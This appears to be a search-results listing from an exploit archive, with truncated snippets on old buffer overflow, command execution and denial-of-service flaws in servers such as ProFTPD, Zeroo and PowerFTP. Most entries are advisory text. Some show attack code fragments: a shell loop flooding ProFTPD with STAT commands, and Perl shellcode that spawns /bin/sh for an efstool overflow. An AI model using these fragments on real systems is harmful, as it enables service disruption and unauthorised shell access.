449 matches found
Monkey HTTP Daemon 0.4/0.5/0.6 - Excessive POST Data Buffer Overflow
source: https://www.securityfocus.com/bid/7202/info Monkey HTTP Daemon is prone to a boundary condition error. This condition occurs when the server attempts to handle excessive HTTP POST data. Exploitation could allow a remote attacker to corrupt sensitive regions of memory with attacker-supplie...
PHPPing 0.1 - Remote Command Execution
PHPPing 0.1 - Remote Command Execution source: https://www.securityfocus.com/bid/7030/info A vulnerability has been reported in PHPPing that may allow remote attackers to execute commands on vulnerable systems. The vulnerability exists in the index.php script file. Some variables are not properly...
EType EServ 1.9x - NNTP Remote Denial of Service
source: https://www.securityfocus.com/bid/6522/info EServ is a proxy software package distributed by EType. It is available for Microsoft Windows operating systems. It has been reported that a problem in EServ may cause the software to crash. When a remote user sends a large amount of data via...
prodos.sh
Hello, proftpd is vulnerable to denial of service similar to the list /..//..//../. !/bin/sh proftpd do this some more to make sure the system eventually dies cnt=25 while $cnt -gt 0 ; do ftp -n EOF& o $1 quote user $2 quote pass $3 quote stat /////// quit EOF let cnt=cnt-1 done sleep 2 killall -...
ProFTPd 1.2.x - STAT Denial of Service
ProFTPd 1.2.x - STAT Denial of Service source: https://www.securityfocus.com/bid/6341/info A denial of service vulnerability has been reported for ProFTPD. It is possible to cause ProFTPD from responding to legitimate requests for service by issuing specially crafted STAT commands. This will resu...
zerooexploit.txt
According to the vendor's web page , Zeroo is a "simple, small, portable, fast HTTP server". The server is available for Windows, and Linux operating systems. A folder traversal flaw in the server may allow attackers to compromise sensitive information stored on the server's volume. !/usr/bin/per...
liteserve.txt
Christopher Fillion's "Perception" web site hosts the LiteServe combination server for Win32. The server offers HTTP, FTP, SMTP, POP3, and Telnet services. Included in the HTTP service is a Common Gateway Interface CGI feature that allows you to specify a CGI alias, as well as "filters" that are...
Lonerunner Zeroo HTTP Server 1.5 - Remote Buffer Overflow
source: https://www.securityfocus.com/bid/6190/info Zeroo HTTP server is a freely available, open source web server. It is available for the Linux and Microsoft Windows platforms. It has been reported that Zeroo HTTP server does not sufficiently check bounds on some requests. This occurs when a...
TFTP Server DoS
Product: TFTP Server 2002 Standard Edition Authors: SolarWinds www.SolarWinds.net Vulnerable versions: v.5.0.55 and bellow Vulnerability: buffer overflow Bug&exploit by D4rkGr3y www.dhgroup.org Overview-------------------------------------------------------------- From TFTP Server help: "Many...
efstool.pl
!/usr/bin/perl Another efstool exploit $shell = "\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x31\xc0\x50\x89". "\xe2\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89". "\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; $ret =0xbfffe590; $buf = 3000; $egg = 2000; $nop = "\x90"; $offset = 0; if @ARGV == 1 $offset = $ARGV0;...
602Pro LAN SUITE 2002 - Telnet Proxy localhost Denial of Service
602Pro LAN SUITE 2002 - Telnet Proxy localhost Denial of Service source: https://www.securityfocus.com/bid/5416/info The 602Pro LAN SUITE 2002 Telnet Proxy is reported to be prone to a denial of service condition. It is possible for proxy users to use the loopback interface to connect to localhos...
602Pro LAN SUITE 2002 - Telnet Proxy localhost Denial of Service
source: https://www.securityfocus.com/bid/5416/info The 602Pro LAN SUITE 2002 Telnet Proxy is reported to be prone to a denial of service condition. It is possible for proxy users to use the loopback interface to connect to localhost. If a large number of these connections are made concurrently, ...
wbboard 1.1.1 Cross Site Scripting Vulnerability
wbboard 1.1.1 Cross Site Scripting Vulnerability - ------------------------- Affected program : wbboard 1.1.1 is a phpBB-like PHP forum Vendor : http://www.woltlab.de/ Vulnerability-Class : Cross Site Scripting CSS OS specific : No Problem-Type : Joke severity : No risk SUMMARY 1.WBBoard allowed ...
Burning Board 1.1.1 - 'URL' Manipulation
source: https://www.securityfocus.com/bid/4512/info Burning Board is web forum software. It is written in PHP, back-ended by MySQL, and will run on most Unix and Linux variants as well as Microsoft Windows. An attacker may allegedly create a malicious link which is capable of causing actions to b...
Phusion WebServer 1.0 - Long URL Denial of Service
Phusion WebServer 1.0 - Long URL Denial of Service source: https://www.securityfocus.com/bid/4118/info Phusion Webserver is a commercial HTTP server that runs on Microsoft Windows 9x/NT/2000 operating systems. It is possible for a remote attacker to deny service to legitimate users of the service...
Phusion WebServer 1.0 - Long URL Denial of Service
source: https://www.securityfocus.com/bid/4118/info Phusion Webserver is a commercial HTTP server that runs on Microsoft Windows 9x/NT/2000 operating systems. It is possible for a remote attacker to deny service to legitimate users of the service by submitting an excessively long web request...
bru backup program
Product: Bru Description: ------------ BRU provides fully verified backup and restore operations and offers options for most conceivable data backup and recovery needs. BRU is fully device independent, so it works with any device or filesystem that is supported by your operating system...
Cyberstop Web Server 0.1 - Long Request Denial of Service
Cyberstop Web Server 0.1 - Long Request Denial of Service source: https://www.securityfocus.com/bid/3930/info Cyberstop is a web server for Windows 9x/NT/2000 systems. Attacks can be launched on a Cyberstop host if a request is submitted containing an unusual number of arbitrary characters...
Microsoft IIS/5.0 Content-Length DoS (proved)
Well, finally I have done testing about and I have made a 1gb RAM server to get Out Of Virtual Memory and basically unusable with one script that uses the flaw exposed on the other mails. I suppose that now it's a real security bug. Thanks Ivan Hernandez...
Cooolsoft PowerFTP Server 2.0 32.10 - Multiple Denial of Service Vulnerabilities (2)
Cooolsoft PowerFTP Server 2.0 32.10 - Multiple Denial of Service Vulnerabilities 2 source: https://www.securityfocus.com/bid/3595/info PowerFTP is a commercial FTP server for Microsoft Windows 9x/ME/NT/2000/XP operating systems. It is maintained by Cooolsoft. Multiple instances of denial of servi...